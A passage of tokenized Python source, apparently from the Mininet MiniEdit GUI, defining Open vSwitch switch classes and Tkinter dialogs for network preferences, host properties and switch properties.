setParam ( _params , '<STR_LIT>' , ip = '<STR_LIT>' ) <EOL> r = Node . config ( self , ** _params ) <EOL> self . cmd ( '<STR_LIT>' ) <EOL> return r <EOL> class LegacySwitch ( OVSSwitch ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , name , ** params ) : <EOL> OVSSwitch . __init__ ( self , name , failMode = '<STR_LIT>' , ** params ) <EOL> self . switchIP = None <EOL> class customOvs ( OVSSwitch ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , name , failMode = '<STR_LIT>' , datapath = '<STR_LIT>' , ** params ) : <EOL> OVSSwitch . __init__ ( self , name , failMode = failMode , datapath = datapath , ** params ) <EOL> self . switchIP = None <EOL> def getSwitchIP ( self ) : <EOL> "<STR_LIT>" <EOL> return self . switchIP <EOL> def setSwitchIP ( self , ip ) : <EOL> "<STR_LIT>" <EOL> self . switchIP = ip <EOL> def start ( self , controllers ) : <EOL> "<STR_LIT>" <EOL> OVSSwitch . start ( self , controllers ) <EOL> if self . switchIP is not None : <EOL> self . cmd ( '<STR_LIT>' , self , self . switchIP ) <EOL> class PrefsDialog ( tkSimpleDialog . Dialog ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , parent , title , prefDefaults ) : <EOL> self . prefValues = prefDefaults <EOL> tkSimpleDialog . Dialog . __init__ ( self , parent , title ) <EOL> def body ( self , master ) : <EOL> "<STR_LIT>" <EOL> self . rootFrame = master <EOL> self . leftfieldFrame = Frame ( self . rootFrame , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . leftfieldFrame . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:2> ) <EOL> self . rightfieldFrame = Frame ( self . rootFrame , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . rightfieldFrame . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:2> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:2> ) <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , sticky = E ) <EOL> self . ipEntry = Entry ( self . leftfieldFrame ) <EOL> self . ipEntry . 
grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> ipBase = self . prefValues [ '<STR_LIT>' ] <EOL> self . ipEntry . insert ( <NUM_LIT:0> , ipBase ) <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:1> , sticky = E ) <EOL> self . terminalVar = StringVar ( self . leftfieldFrame ) <EOL> self . terminalOption = OptionMenu ( self . leftfieldFrame , self . terminalVar , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . terminalOption . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> , sticky = W ) <EOL> terminalType = self . prefValues [ '<STR_LIT>' ] <EOL> self . terminalVar . set ( terminalType ) <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:2> , sticky = E ) <EOL> self . cliStart = IntVar ( ) <EOL> self . cliButton = Checkbutton ( self . leftfieldFrame , variable = self . cliStart ) <EOL> self . cliButton . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:1> , sticky = W ) <EOL> if self . prefValues [ '<STR_LIT>' ] == '<STR_LIT:0>' : <EOL> self . cliButton . deselect ( ) <EOL> else : <EOL> self . cliButton . select ( ) <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:3> , sticky = E ) <EOL> self . switchType = StringVar ( self . leftfieldFrame ) <EOL> self . switchTypeMenu = OptionMenu ( self . leftfieldFrame , self . switchType , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . switchTypeMenu . grid ( row = <NUM_LIT:3> , column = <NUM_LIT:1> , sticky = W ) <EOL> switchTypePref = self . prefValues [ '<STR_LIT>' ] <EOL> if switchTypePref == '<STR_LIT>' : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> elif switchTypePref == '<STR_LIT>' : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> elif switchTypePref == '<STR_LIT:user>' : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> else : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> ovsFrame = LabelFrame ( self . 
leftfieldFrame , text = '<STR_LIT>' , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> ovsFrame . grid ( row = <NUM_LIT:4> , column = <NUM_LIT:0> , columnspan = <NUM_LIT:2> , sticky = EW ) <EOL> Label ( ovsFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , sticky = E ) <EOL> Label ( ovsFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:1> , sticky = E ) <EOL> Label ( ovsFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:2> , sticky = E ) <EOL> Label ( ovsFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:3> , sticky = E ) <EOL> self . ovsOf10 = IntVar ( ) <EOL> self . covsOf10 = Checkbutton ( ovsFrame , variable = self . ovsOf10 ) <EOL> self . covsOf10 . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> , sticky = W ) <EOL> if self . prefValues [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT:0>' : <EOL> self . covsOf10 . deselect ( ) <EOL> else : <EOL> self . covsOf10 . select ( ) <EOL> self . ovsOf11 = IntVar ( ) <EOL> self . covsOf11 = Checkbutton ( ovsFrame , variable = self . ovsOf11 ) <EOL> self . covsOf11 . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> , sticky = W ) <EOL> if self . prefValues [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT:0>' : <EOL> self . covsOf11 . deselect ( ) <EOL> else : <EOL> self . covsOf11 . select ( ) <EOL> self . ovsOf12 = IntVar ( ) <EOL> self . covsOf12 = Checkbutton ( ovsFrame , variable = self . ovsOf12 ) <EOL> self . covsOf12 . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:1> , sticky = W ) <EOL> if self . prefValues [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT:0>' : <EOL> self . covsOf12 . deselect ( ) <EOL> else : <EOL> self . covsOf12 . select ( ) <EOL> self . ovsOf13 = IntVar ( ) <EOL> self . covsOf13 = Checkbutton ( ovsFrame , variable = self . ovsOf13 ) <EOL> self . covsOf13 . grid ( row = <NUM_LIT:3> , column = <NUM_LIT:1> , sticky = W ) <EOL> if self . prefValues [ '<STR_LIT>' ] [ '<STR_LIT>' ] == '<STR_LIT:0>' : <EOL> self . covsOf13 . deselect ( ) <EOL> else : <EOL> self . covsOf13 . 
select ( ) <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:5> , sticky = E ) <EOL> self . dpctlEntry = Entry ( self . leftfieldFrame ) <EOL> self . dpctlEntry . grid ( row = <NUM_LIT:5> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . dpctlEntry . insert ( <NUM_LIT:0> , self . prefValues [ '<STR_LIT>' ] ) <EOL> sflowValues = self . prefValues [ '<STR_LIT>' ] <EOL> self . sflowFrame = LabelFrame ( self . rightfieldFrame , text = '<STR_LIT>' , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . sflowFrame . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , columnspan = <NUM_LIT:2> , sticky = EW ) <EOL> Label ( self . sflowFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , sticky = E ) <EOL> self . sflowTarget = Entry ( self . sflowFrame ) <EOL> self . sflowTarget . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> self . sflowTarget . insert ( <NUM_LIT:0> , sflowValues [ '<STR_LIT>' ] ) <EOL> Label ( self . sflowFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:1> , sticky = E ) <EOL> self . sflowSampling = Entry ( self . sflowFrame ) <EOL> self . sflowSampling . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> ) <EOL> self . sflowSampling . insert ( <NUM_LIT:0> , sflowValues [ '<STR_LIT>' ] ) <EOL> Label ( self . sflowFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:2> , sticky = E ) <EOL> self . sflowHeader = Entry ( self . sflowFrame ) <EOL> self . sflowHeader . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:1> ) <EOL> self . sflowHeader . insert ( <NUM_LIT:0> , sflowValues [ '<STR_LIT>' ] ) <EOL> Label ( self . sflowFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:3> , sticky = E ) <EOL> self . sflowPolling = Entry ( self . sflowFrame ) <EOL> self . sflowPolling . grid ( row = <NUM_LIT:3> , column = <NUM_LIT:1> ) <EOL> self . sflowPolling . insert ( <NUM_LIT:0> , sflowValues [ '<STR_LIT>' ] ) <EOL> nflowValues = self . prefValues [ '<STR_LIT>' ] <EOL> self . 
nFrame = LabelFrame ( self . rightfieldFrame , text = '<STR_LIT>' , padx = <NUM_LIT:5> , pady = <NUM_LIT:5> ) <EOL> self . nFrame . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , columnspan = <NUM_LIT:2> , sticky = EW ) <EOL> Label ( self . nFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , sticky = E ) <EOL> self . nflowTarget = Entry ( self . nFrame ) <EOL> self . nflowTarget . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> self . nflowTarget . insert ( <NUM_LIT:0> , nflowValues [ '<STR_LIT>' ] ) <EOL> Label ( self . nFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:1> , sticky = E ) <EOL> self . nflowTimeout = Entry ( self . nFrame ) <EOL> self . nflowTimeout . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> ) <EOL> self . nflowTimeout . insert ( <NUM_LIT:0> , nflowValues [ '<STR_LIT>' ] ) <EOL> Label ( self . nFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:2> , sticky = E ) <EOL> self . nflowAddId = IntVar ( ) <EOL> self . nflowAddIdButton = Checkbutton ( self . nFrame , variable = self . nflowAddId ) <EOL> self . nflowAddIdButton . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:1> , sticky = W ) <EOL> if nflowValues [ '<STR_LIT>' ] == '<STR_LIT:0>' : <EOL> self . nflowAddIdButton . deselect ( ) <EOL> else : <EOL> self . nflowAddIdButton . select ( ) <EOL> return self . ipEntry <EOL> def apply ( self ) : <EOL> ipBase = self . ipEntry . get ( ) <EOL> terminalType = self . terminalVar . get ( ) <EOL> startCLI = str ( self . cliStart . get ( ) ) <EOL> sw = self . switchType . get ( ) <EOL> dpctl = self . dpctlEntry . get ( ) <EOL> ovsOf10 = str ( self . ovsOf10 . get ( ) ) <EOL> ovsOf11 = str ( self . ovsOf11 . get ( ) ) <EOL> ovsOf12 = str ( self . ovsOf12 . get ( ) ) <EOL> ovsOf13 = str ( self . ovsOf13 . get ( ) ) <EOL> sflowValues = { '<STR_LIT>' : self . sflowTarget . get ( ) , <EOL> '<STR_LIT>' : self . sflowSampling . get ( ) , <EOL> '<STR_LIT>' : self . sflowHeader . get ( ) , <EOL> '<STR_LIT>' : self . sflowPolling . 
get ( ) } <EOL> nflowvalues = { '<STR_LIT>' : self . nflowTarget . get ( ) , <EOL> '<STR_LIT>' : self . nflowTimeout . get ( ) , <EOL> '<STR_LIT>' : str ( self . nflowAddId . get ( ) ) } <EOL> self . result = { '<STR_LIT>' : ipBase , <EOL> '<STR_LIT>' : terminalType , <EOL> '<STR_LIT>' : dpctl , <EOL> '<STR_LIT>' : sflowValues , <EOL> '<STR_LIT>' : nflowvalues , <EOL> '<STR_LIT>' : startCLI } <EOL> if sw == '<STR_LIT>' : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if StrictVersion ( MININET_VERSION ) < StrictVersion ( '<STR_LIT>' ) : <EOL> self . ovsOk = False <EOL> showerror ( title = "<STR_LIT>" , <EOL> message = '<STR_LIT>' + VERSION + '<STR_LIT:.>' ) <EOL> elif sw == '<STR_LIT>' : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT:user>' <EOL> elif sw == '<STR_LIT>' : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> self . result [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . ovsOk = True <EOL> if ovsOf11 == "<STR_LIT:1>" : <EOL> ovsVer = self . getOvsVersion ( ) <EOL> if StrictVersion ( ovsVer ) < StrictVersion ( '<STR_LIT>' ) : <EOL> self . ovsOk = False <EOL> showerror ( title = "<STR_LIT>" , <EOL> message = '<STR_LIT>' + ovsVer + '<STR_LIT:.>' ) <EOL> if ovsOf12 == "<STR_LIT:1>" or ovsOf13 == "<STR_LIT:1>" : <EOL> ovsVer = self . getOvsVersion ( ) <EOL> if StrictVersion ( ovsVer ) < StrictVersion ( '<STR_LIT>' ) : <EOL> self . ovsOk = False <EOL> showerror ( title = "<STR_LIT>" , <EOL> message = '<STR_LIT>' + ovsVer + '<STR_LIT:.>' ) <EOL> if self . ovsOk : <EOL> self . result [ '<STR_LIT>' ] = { '<STR_LIT>' : ovsOf10 , <EOL> '<STR_LIT>' : ovsOf11 , <EOL> '<STR_LIT>' : ovsOf12 , <EOL> '<STR_LIT>' : ovsOf13 } <EOL> else : <EOL> self . result = None <EOL> @ staticmethod <EOL> def getOvsVersion ( ) : <EOL> "<STR_LIT>" <EOL> outp = quietRun ( "<STR_LIT>" ) <EOL> r = r'<STR_LIT>' <EOL> m = re . search ( r , outp ) <EOL> if m is None : <EOL> print '<STR_LIT>' <EOL> return None <EOL> else : <EOL> print '<STR_LIT>' + m . 
group ( <NUM_LIT:1> ) <EOL> return m . group ( <NUM_LIT:1> ) <EOL> class CustomDialog ( object ) : <EOL> def __init__ ( self , master , _title ) : <EOL> self . top = Toplevel ( master ) <EOL> self . bodyFrame = Frame ( self . top ) <EOL> self . bodyFrame . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' ) <EOL> self . body ( self . bodyFrame ) <EOL> buttonFrame = Frame ( self . top , relief = '<STR_LIT>' , bd = <NUM_LIT:3> , bg = '<STR_LIT>' ) <EOL> buttonFrame . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' ) <EOL> okButton = Button ( buttonFrame , width = <NUM_LIT:8> , text = '<STR_LIT:OK>' , relief = '<STR_LIT>' , <EOL> bd = <NUM_LIT:4> , command = self . okAction ) <EOL> okButton . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = E ) <EOL> canlceButton = Button ( buttonFrame , width = <NUM_LIT:8> , text = '<STR_LIT>' , relief = '<STR_LIT>' , <EOL> bd = <NUM_LIT:4> , command = self . cancelAction ) <EOL> canlceButton . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> , sticky = W ) <EOL> def body ( self , master ) : <EOL> self . rootFrame = master <EOL> def apply ( self ) : <EOL> self . top . destroy ( ) <EOL> def cancelAction ( self ) : <EOL> self . top . destroy ( ) <EOL> def okAction ( self ) : <EOL> self . apply ( ) <EOL> self . top . destroy ( ) <EOL> class HostDialog ( CustomDialog ) : <EOL> def __init__ ( self , master , title , prefDefaults ) : <EOL> self . prefValues = prefDefaults <EOL> self . result = None <EOL> CustomDialog . __init__ ( self , master , title ) <EOL> def body ( self , master ) : <EOL> self . rootFrame = master <EOL> n = Notebook ( self . rootFrame ) <EOL> self . propFrame = Frame ( n ) <EOL> self . vlanFrame = Frame ( n ) <EOL> self . interfaceFrame = Frame ( n ) <EOL> self . mountFrame = Frame ( n ) <EOL> n . add ( self . propFrame , text = '<STR_LIT>' ) <EOL> n . add ( self . vlanFrame , text = '<STR_LIT>' ) <EOL> n . add ( self . 
interfaceFrame , text = '<STR_LIT>' ) <EOL> n . add ( self . mountFrame , text = '<STR_LIT>' ) <EOL> n . pack ( ) <EOL> Label ( self . propFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , sticky = E ) <EOL> self . hostnameEntry = Entry ( self . propFrame ) <EOL> self . hostnameEntry . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . hostnameEntry . insert ( <NUM_LIT:0> , self . prefValues [ '<STR_LIT>' ] ) <EOL> Label ( self . propFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:1> , sticky = E ) <EOL> self . ipEntry = Entry ( self . propFrame ) <EOL> self . ipEntry . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . ipEntry . insert ( <NUM_LIT:0> , self . prefValues [ '<STR_LIT>' ] ) <EOL> Label ( self . propFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:2> , sticky = E ) <EOL> self . routeEntry = Entry ( self . propFrame ) <EOL> self . routeEntry . grid ( row = <NUM_LIT:2> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . routeEntry . insert ( <NUM_LIT:0> , self . prefValues [ '<STR_LIT>' ] ) <EOL> Label ( self . propFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:3> , sticky = E ) <EOL> self . cpuEntry = Entry ( self . propFrame ) <EOL> self . cpuEntry . grid ( row = <NUM_LIT:3> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . cpuEntry . insert ( <NUM_LIT:0> , str ( self . prefValues [ '<STR_LIT>' ] ) ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> sched = self . prefValues [ '<STR_LIT>' ] <EOL> else : <EOL> sched = '<STR_LIT:host>' <EOL> self . schedVar = StringVar ( self . propFrame ) <EOL> self . schedOption = OptionMenu ( self . propFrame , self . schedVar , "<STR_LIT:host>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . schedOption . grid ( row = <NUM_LIT:3> , column = <NUM_LIT:2> , sticky = W ) <EOL> self . schedVar . set ( sched ) <EOL> Label ( self . 
propFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:4> , sticky = E ) <EOL> self . coreEntry = Entry ( self . propFrame ) <EOL> self . coreEntry . grid ( row = <NUM_LIT:4> , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . coreEntry . insert ( <NUM_LIT:1> , self . prefValues [ '<STR_LIT>' ] ) <EOL> Label ( self . propFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:5> , sticky = E ) <EOL> self . startEntry = Entry ( self . propFrame ) <EOL> self . startEntry . grid ( row = <NUM_LIT:5> , column = <NUM_LIT:1> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:3> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . startEntry . insert ( <NUM_LIT:0> , str ( self . prefValues [ '<STR_LIT>' ] ) ) <EOL> Label ( self . propFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:6> , sticky = E ) <EOL> self . stopEntry = Entry ( self . propFrame ) <EOL> self . stopEntry . grid ( row = <NUM_LIT:6> , column = <NUM_LIT:1> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:3> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . stopEntry . insert ( <NUM_LIT:0> , str ( self . prefValues [ '<STR_LIT>' ] ) ) <EOL> self . externalInterfaces = <NUM_LIT:0> <EOL> Label ( self . interfaceFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = E ) <EOL> self . b = Button ( self . interfaceFrame , text = '<STR_LIT>' , command = self . addInterface ) <EOL> self . b . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> self . interfaceFrame = VerticalScrolledTable ( self . interfaceFrame , rows = <NUM_LIT:0> , columns = <NUM_LIT:1> , title = '<STR_LIT>' ) <EOL> self . interfaceFrame . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:2> ) <EOL> self . tableFrame = self . interfaceFrame . interior <EOL> self . tableFrame . addRow ( value = [ '<STR_LIT>' ] , readonly = True ) <EOL> externalInterfaces = [ ] <EOL> if '<STR_LIT>' in self . 
prefValues : <EOL> externalInterfaces = self . prefValues [ '<STR_LIT>' ] <EOL> for externalInterface in externalInterfaces : <EOL> self . tableFrame . addRow ( value = [ externalInterface ] ) <EOL> self . vlanInterfaces = <NUM_LIT:0> <EOL> Label ( self . vlanFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = E ) <EOL> self . vlanButton = Button ( self . vlanFrame , text = '<STR_LIT>' , command = self . addVlanInterface ) <EOL> self . vlanButton . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> self . vlanFrame = VerticalScrolledTable ( self . vlanFrame , rows = <NUM_LIT:0> , columns = <NUM_LIT:2> , title = '<STR_LIT>' ) <EOL> self . vlanFrame . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:2> ) <EOL> self . vlanTableFrame = self . vlanFrame . interior <EOL> self . vlanTableFrame . addRow ( value = [ '<STR_LIT>' , '<STR_LIT>' ] , readonly = True ) <EOL> vlanInterfaces = [ ] <EOL> if '<STR_LIT>' in self . prefValues : <EOL> vlanInterfaces = self . prefValues [ '<STR_LIT>' ] <EOL> for vlanInterface in vlanInterfaces : <EOL> self . vlanTableFrame . addRow ( value = vlanInterface ) <EOL> self . privateDirectories = <NUM_LIT:0> <EOL> Label ( self . mountFrame , text = "<STR_LIT>" ) . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = E ) <EOL> self . mountButton = Button ( self . mountFrame , text = '<STR_LIT>' , command = self . addDirectory ) <EOL> self . mountButton . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> ) <EOL> self . mountFrame = VerticalScrolledTable ( self . mountFrame , rows = <NUM_LIT:0> , columns = <NUM_LIT:2> , title = '<STR_LIT>' ) <EOL> self . mountFrame . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' , columnspan = <NUM_LIT:2> ) <EOL> self . mountTableFrame = self . mountFrame . interior <EOL> self . mountTableFrame . 
addRow ( value = [ '<STR_LIT>' , '<STR_LIT>' ] , readonly = True ) <EOL> directoryList = [ ] <EOL> if '<STR_LIT>' in self . prefValues : <EOL> directoryList = self . prefValues [ '<STR_LIT>' ] <EOL> for privateDir in directoryList : <EOL> if isinstance ( privateDir , tuple ) : <EOL> self . mountTableFrame . addRow ( value = privateDir ) <EOL> else : <EOL> self . mountTableFrame . addRow ( value = [ privateDir , '<STR_LIT>' ] ) <EOL> def addDirectory ( self ) : <EOL> self . mountTableFrame . addRow ( ) <EOL> def addVlanInterface ( self ) : <EOL> self . vlanTableFrame . addRow ( ) <EOL> def addInterface ( self ) : <EOL> self . tableFrame . addRow ( ) <EOL> def apply ( self ) : <EOL> externalInterfaces = [ ] <EOL> for row in range ( self . tableFrame . rows ) : <EOL> if ( len ( self . tableFrame . get ( row , <NUM_LIT:0> ) ) > <NUM_LIT:0> and <EOL> row > <NUM_LIT:0> ) : <EOL> externalInterfaces . append ( self . tableFrame . get ( row , <NUM_LIT:0> ) ) <EOL> vlanInterfaces = [ ] <EOL> for row in range ( self . vlanTableFrame . rows ) : <EOL> if ( len ( self . vlanTableFrame . get ( row , <NUM_LIT:0> ) ) > <NUM_LIT:0> and <EOL> len ( self . vlanTableFrame . get ( row , <NUM_LIT:1> ) ) > <NUM_LIT:0> and <EOL> row > <NUM_LIT:0> ) : <EOL> vlanInterfaces . append ( [ self . vlanTableFrame . get ( row , <NUM_LIT:0> ) , self . vlanTableFrame . get ( row , <NUM_LIT:1> ) ] ) <EOL> privateDirectories = [ ] <EOL> for row in range ( self . mountTableFrame . rows ) : <EOL> if len ( self . mountTableFrame . get ( row , <NUM_LIT:0> ) ) > <NUM_LIT:0> and row > <NUM_LIT:0> : <EOL> if len ( self . mountTableFrame . get ( row , <NUM_LIT:1> ) ) > <NUM_LIT:0> : <EOL> privateDirectories . append ( ( self . mountTableFrame . get ( row , <NUM_LIT:0> ) , self . mountTableFrame . get ( row , <NUM_LIT:1> ) ) ) <EOL> else : <EOL> privateDirectories . append ( self . mountTableFrame . get ( row , <NUM_LIT:0> ) ) <EOL> results = { '<STR_LIT>' : self . cpuEntry . 
get ( ) , <EOL> '<STR_LIT>' : self . coreEntry . get ( ) , <EOL> '<STR_LIT>' : self . schedVar . get ( ) , <EOL> '<STR_LIT>' : self . hostnameEntry . get ( ) , <EOL> '<STR_LIT>' : self . ipEntry . get ( ) , <EOL> '<STR_LIT>' : self . routeEntry . get ( ) , <EOL> '<STR_LIT>' : self . startEntry . get ( ) , <EOL> '<STR_LIT>' : self . stopEntry . get ( ) , <EOL> '<STR_LIT>' : privateDirectories , <EOL> '<STR_LIT>' : externalInterfaces , <EOL> '<STR_LIT>' : vlanInterfaces } <EOL> self . result = results <EOL> class SwitchDialog ( CustomDialog ) : <EOL> def __init__ ( self , master , title , prefDefaults ) : <EOL> self . prefValues = prefDefaults <EOL> self . result = None <EOL> CustomDialog . __init__ ( self , master , title ) <EOL> def body ( self , master ) : <EOL> self . rootFrame = master <EOL> self . leftfieldFrame = Frame ( self . rootFrame ) <EOL> self . rightfieldFrame = Frame ( self . rootFrame ) <EOL> self . leftfieldFrame . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = '<STR_LIT>' ) <EOL> self . rightfieldFrame . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> , sticky = '<STR_LIT>' ) <EOL> rowCount = <NUM_LIT:0> <EOL> externalInterfaces = [ ] <EOL> if '<STR_LIT>' in self . prefValues : <EOL> externalInterfaces = self . prefValues [ '<STR_LIT>' ] <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . hostnameEntry = Entry ( self . leftfieldFrame ) <EOL> self . hostnameEntry . grid ( row = rowCount , column = <NUM_LIT:1> ) <EOL> self . hostnameEntry . insert ( <NUM_LIT:0> , self . prefValues [ '<STR_LIT>' ] ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . dpidEntry = Entry ( self . leftfieldFrame ) <EOL> self . dpidEntry . grid ( row = rowCount , column = <NUM_LIT:1> ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> self . dpidEntry . insert ( <NUM_LIT:0> , self . 
prefValues [ '<STR_LIT>' ] ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . nflow = IntVar ( ) <EOL> self . nflowButton = Checkbutton ( self . leftfieldFrame , variable = self . nflow ) <EOL> self . nflowButton . grid ( row = rowCount , column = <NUM_LIT:1> , sticky = W ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> if self . prefValues [ '<STR_LIT>' ] == '<STR_LIT:0>' : <EOL> self . nflowButton . deselect ( ) <EOL> else : <EOL> self . nflowButton . select ( ) <EOL> else : <EOL> self . nflowButton . deselect ( ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . sflow = IntVar ( ) <EOL> self . sflowButton = Checkbutton ( self . leftfieldFrame , variable = self . sflow ) <EOL> self . sflowButton . grid ( row = rowCount , column = <NUM_LIT:1> , sticky = W ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> if self . prefValues [ '<STR_LIT>' ] == '<STR_LIT:0>' : <EOL> self . sflowButton . deselect ( ) <EOL> else : <EOL> self . sflowButton . select ( ) <EOL> else : <EOL> self . sflowButton . deselect ( ) <EOL> rowCount += <NUM_LIT:1> <EOL> Label ( self . leftfieldFrame , text = "<STR_LIT>" ) . grid ( row = rowCount , sticky = E ) <EOL> self . switchType = StringVar ( self . leftfieldFrame ) <EOL> self . switchTypeMenu = OptionMenu ( self . leftfieldFrame , self . switchType , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . switchTypeMenu . grid ( row = rowCount , column = <NUM_LIT:1> , sticky = W ) <EOL> if '<STR_LIT>' in self . prefValues : <EOL> switchTypePref = self . prefValues [ '<STR_LIT>' ] <EOL> if switchTypePref == '<STR_LIT>' : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> elif switchTypePref == '<STR_LIT>' : <EOL> self . switchType . set ( "<STR_LIT>" ) <EOL> elif switchTypePref == '<STR_LIT:user>' : <EOL> self . switchType . 
